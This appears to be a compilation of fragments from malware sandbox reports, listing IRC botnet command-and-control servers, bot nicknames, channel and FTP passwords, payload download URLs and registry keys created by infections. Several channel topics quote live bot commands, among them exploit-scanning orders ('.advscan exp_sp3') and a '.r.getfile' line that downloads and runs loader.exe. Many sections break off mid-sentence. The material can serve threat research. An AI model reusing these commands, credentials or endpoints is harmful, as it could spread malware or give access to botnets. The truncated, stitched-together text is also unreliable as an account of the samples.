Author: Pig

DarkSons.Virus.Gov

Remote Host       Port Number
193.242.108.49    80
216.45.58.150     80
64.120.11.167     5900

* The data identified by the following URLs was then requested from the remote web server:
  o http://193.242.108.49/Dialer_Min/number.asp
  o http://www.sitepalace.com/w0rmreaper/NoVaC.jpeg

NICK VirUs-jbqiiweh
USER VirUs “” “bud” :8Coded8VirUs..
JOIN #THeRaNdOm1# Virus
PRIVMSG #THeRaNdOm1# :Success.
PONG :DarkSons.Virus.Gov
PASS Virus

Registry Modifications

* The following Registry Key was created:
  o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{67KLN5J0-4OPM-61WE-KKX2-457QWE23218}

* The

armageddoncheats.net

Remote Host       Port Number
213.5.65.29       21
213.5.65.29       35989
213.5.65.29       80

FTP connections:
USER cmin04@armageddoncheats.net
USER rmin01@armageddoncheats.net
passwd:123456

* The data identified by the following URLs was then requested from the remote web server:
  o http://armageddoncheats.net/1.php?p1=COMPUTERNAME_HXOR
  o http://armageddoncheats.net/2.php?p1=COMPUTERNAME_HXOR&p2=.
  o http://armageddoncheats.net/2.php?p1=COMPUTERNAME_HXOR&p2=..
  o http://armageddoncheats.net/3.php?p1=COMPUTERNAME_HXOR

Registry Modifications

* The following Registry Keys were created:
  o HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_IBUFFER
  o HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_IBUFFER\0000
  o HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_IBUFFER\0000\Control
  o HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\IBuffer
  o HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\IBuffer\Security
  o

gandu.marcandpatrick.net

Name                        Query Type    Query Result     Successful    Protocol
kat.jatajoo.ru              DNS_TYPE_A    91.207.6.166     1
gandu.marcandpatrick.net    DNS_TYPE_A    218.61.22.10     1
hot.jatajoo.ru              DNS_TYPE_A    89.149.244.22    1

218.61.22.10:1544
Nick: [00_AUT_XP_5687882]
Username: SP3-980
Server Pass: pacodedd
Joined Channel: ##f## with Password open
Channel Topic for Channel ##F##: “.asc -S|.http http://rapidshare.com/files/314789063/bay|.advscan exp_sp3 35 3 0 -b -e -r|.advscan exp_sp2 35 3 0 -b -e -r|.advscan exp_sp3 15 3 0

85.17.138.130

Remote Host       Port Number
192.168.88.2      80
85.17.138.130     81

NICK xx[USA|XP]5722214
PONG :index.html
USER oo oo oo :bb
JOIN #.ooo

Registry Modifications

The following Registry Keys were created:
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_MACROVISIONS
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_MACROVISIONS\0000
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Macrovisions
HKEY_CURRENT_USER\Software\Macrovisions

The newly created Registry Values are:

[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_MACROVISIONS\0000]
Service = “Macrovisions”
Legacy = 0x00000001
ConfigFlags = 0x00000000
Class = “LegacyDriver”
ClassGUID = “{8ECC055D-047F-11D1-A537-0000F8753ED1}”
DeviceDesc = “Macrovisions”

[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_MACROVISIONS]
NextInstance = 0x00000001

[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Macrovisions]
DisplayName = “Macrovisions”
ImagePath = “\??\%Temp%\71863.sys”
Type = 0x00000001
Start = 0x00000003

Memory Modifications

There was a

iik.for5love.ru (big ruski botnet)

Host Name                        IP Address
dell-d3e62f7e26                  10.1.12.2
iik.for5love.ru                  195.190.13.187
ik.whytakebi.com                 218.61.22.10
hot.jatajoo.ru hot.jatajoo.ru    195.190.13.187

Download URLs
http://195.190.13.187/hot.php (iik.for5love.ru)
http://195.190.13.187/hot.php (iik.for5love.ru)
http://195.190.13.187/hot.php (iik.for5love.ru)

* C&C Server: 195.190.13.187:7272
* Server Password:
* Username: SP3-152
* Nickname: [N00_DEU_XP_1314922]_CHAR(0x08)_ä@
* Channel: (Password: )
* Channeltopic:

* C&C Server: 218.61.22.10:7272
* Server Password:
* Username: SP3-686
* Nickname: [00_DEU_XP_1861146]
* Channel: #nit (Password: open)
* Channeltopic: :.asc -S|.http http://rapidshare.com/files/314264722/re|.advscan

trbotnet.sytes.net (irc botnet)

Host Name             IP Address
dell-d3e62f7e26       10.1.13.2
trbotnet.sytes.net    85.153.30.14

* C&C Server: 85.153.30.14:6667
* Server Password:
* Username: rciahpk
* Nickname: [DEU|XP|772697]
* Channel: #son (Password: botnetim)
* Channeltopic: :.msn seen foto? hxxp://www.travestiniz.co.cc/images.php?id= |.msn.email hxxp://www.travestiniz.co.cc/images.php?id= |.p2p |.yims

Topic By: [ Load ]

91.207.6.166 (16k botnet)

91.207.6.166 : 1544
91.207.6.166:3838
channel=##F##

Now talking in ##F##
Topic On: [##F## ] [ .asc -S|.http http://rapidshare.com/files/313278869/hus|.advscan exp_sp3 35 3 0 -b -e -r|.advscan exp_sp2 35 3 0 -b -e -r|.advscan exp_sp3 15 3 0 -a -e -r|.advscan exp_sp2 15 3 0 -a -e -r|.r.getfile http://78.159.127.254/del/loader.exe C:\start.exe 1 ]
Topic By: [ ok ]
Modes On: [ ##F## ]

ana.smo7he.net

Host Name                      IP Address
ana.smo7he.net                 95.128.242.245
dell-d3e62f7e26                10.1.14.2
alkeichah.com alkeichah.com    72.35.84.6
u1.k129129.com

UDP Connections
Remote IP Address: 95.128.242.245 Port: 1975
Send Datagram: packet(s) of size 7
Send Datagram: 2 packet(s) of size 3
Send Datagram: packet(s) of size 49
Send Datagram: packet(s) of size 58
Send Datagram: packet(s) of size 1
Recv Datagram: 6329 packet(s) of size 0
Recv Datagram: packet(s) of size 8
Recv Datagram: 2 packet(s)

apolo.c-13.puc.ul

Remote Host       Port Number
66.252.5.47       7000
72.35.84.6        80

* The data identified by the following URL was then requested from the remote web server:
  o http://alkeichah.com/881.exe

NICK jcljatvx
JOIN #usb trb50
QUIT gettin new bin.
NICK dpzgprmi
USER dpzgprmi * 0 :COMPUTERNAME
MODE dpzgprmi +ix
USER jcljatvx * 0 :COMPUTERNAME
MODE jcljatvx +ix

Other details

* The following port was open in the system: